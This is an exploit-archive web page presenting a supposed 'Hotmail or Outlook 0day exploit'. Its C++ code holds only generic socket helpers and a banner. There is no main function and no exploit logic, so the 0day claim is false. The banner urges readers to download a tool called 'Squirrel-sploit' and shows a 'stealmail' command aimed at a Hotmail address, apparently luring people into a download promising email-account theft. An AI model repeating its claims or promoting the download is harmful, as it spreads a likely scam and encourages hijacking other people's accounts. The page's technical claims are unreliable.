首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Hotmail or Outlook 0day exploit by squirrel sploit
来源:vfocus.net 作者:vfocus 发布时间:2013-08-30  
/*
Caution should read this :
  
  
To exploit this vulnerability you must Download Squirrel-sploit.
  
  
*/
  
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <winsock.h>
#include <string>
#include <direct.h>
  
#pragma comment(lib, "wsock32.lib")
  
using namespace std;
  
#define SERVER_PORT 80
  
void header();
int createConnection(string targetAddr, int targetPort);
int sendTransmission(string message);
string recvTransmission();
void cleanUp();
  
WORD sockVersion;
WSADATA wsaData;
  
int sock;
struct sockaddr_in rserver;
  
//Setup the server
int createConnection(string serverIP, int port)
{
        int result = 0, len = 0;
  
        sockVersion = MAKEWORD(1,1);
        WSAStartup(sockVersion, &wsaData);
          
        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
                perror("error: socket()\n");
                result = 1;
        }
  
        rserver.sin_family = AF_INET;
        rserver.sin_port = htons(port);
        rserver.sin_addr.s_addr = inet_addr(serverIP.c_str());
        memset(&rserver.sin_zero, 0, 8);
  
        len = sizeof(struct sockaddr_in);
          
        if ((connect(sock, (struct sockaddr *)&rserver, sizeof(struct sockaddr_in))) == -1)
        {
                perror("error: connect()\n");
                result = 1;
        }
  
        return result;
}
  
void header()
{
printf("________________________________________________________\n");
printf("  ___            _             _             _     _ _ \n");  
printf(" / __| __ _ _  _(_)_ _ _ _ ___| |___ ____ __| |___(_) |_ \n");  
printf(" \__ \/ _` | || | | '_| '_/ -_) |___(_-< '_ \ / _ \ |  _|\n");  
printf(" |___/\__, |\_,_|_|_| |_| \___|_|   /__/ .__/_\___/_|\__|\n");  
printf("         |_|                           |_|               \n");  
printf("\n");
printf("_________________________________________________________\n\n");
printf("Download : sourceforge.net/projects/squirrelsploit/ \n\n");
printf("Tutorial (English): youtube.com/watch?v=zfsBXz3lmRg \n\n");
printf("         (French) : youtube.com/watch?v=X_HGCXajyVA \n\n");
printf("set> stealmail xxxx@hotmail.com \n");
  
}
  
//Send a message
int sendTransmission(string message)
{
        int bytes_sent = 0;
  
        bytes_sent = send(sock, message.c_str(), message.length(), 0);
        if (bytes_sent < 0)
        {
                perror("error: send()\n");
                exit(1);
        }
          
        return bytes_sent;
}
  
//Receive a message
string recvTransmission()
{
        string result;
        char *c = new char[1];
        int bytes_recv = 0;
  
        while (c[0] != NULL)
        {
                bytes_recv = recv(sock, c, 1, 0);
  
                if (bytes_recv < 0)
                {
                        perror("error: recv()\n");
                        //exit(1);
                }
  
                result += c[0];
        }
  
        return result;
}
  
//Clean up the connection
void cleanUp()
{
        closesocket(sock);
        WSACleanup();
}

 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP LoadRunner lrFileIOService
·SPIP connect Parameter PHP Inj
·Firefox XMLSerializer Use Afte
·OSX <= 10.8.4 - Local Root Pri
·SPIP Connect Parameter PHP Inj
·IKE and AuthIP IPsec Keyring M
·VMWare Setuid vmware-mount Uns
·KingView 6.53 - ActiveX Remote
·xml2 Fuzzer 1.0 exploit
·KingView 6.53 - Insecure Activ
·WinAmp 5.63 (winamp.ini) - Loc
·jetAudio 8.0.16.2000 Plus VX -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved